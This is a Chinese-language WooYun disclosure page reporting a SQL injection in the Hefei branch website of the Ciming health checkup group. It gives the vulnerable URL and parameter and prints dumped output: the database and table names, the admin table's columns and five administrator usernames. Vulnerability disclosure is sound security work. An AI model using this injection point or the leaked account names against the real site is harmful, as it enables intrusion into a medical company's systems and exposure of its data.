当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137304

漏洞标题:慈铭体检集团之合肥站注射

相关厂商:慈铭体检集团

漏洞作者: 冷白开。

提交时间:2015-08-28 10:30

修复时间:2015-10-12 10:32

公开时间:2015-10-12 10:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

慈铭体检集团之合肥站注射

详细说明:

注射点:

http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34

1.png

脱出数据

available databases [2]:
[*] information_schema
[*] sqlhefeiciming
Database: sqlhefeiciming
[28 tables]
+------------------+
| user             |
| admin_mod        |
| admin_user       |
| admin_useroption |
| art_dis_config   |
| article          |
| category         |
| cnt              |
| color_code       |
| comes            |
| company_email    |
| control_sys      |
| cr_columninfo    |
| doc_useroption   |
| docuser          |
| edit_type        |
| info_set         |
| information      |
| iplist           |
| message          |
| order_goods      |
| order_product    |
| set_value        |
| shopproduct      |
| shopuser         |
| shu              |
| survey           |
| urls             |
+------------------+
Database: sqlhefeiciming
Table: admin_user
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| date     | datetime    |
| id       | int(11)     |
| realname | varchar(40) |
| username | varchar(64) |
| userpswd | varchar(64) |
| usertype | varchar(20) |
+----------+-------------+
Database: sqlhefeiciming
Table: admin_user
[5 entries]
+-----------+
| username  |
+-----------+
| admin     |
| cm_admin  |
| seo123    |
| web_admin |
| wj_admin! |
+-----------+

密码

2.png

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝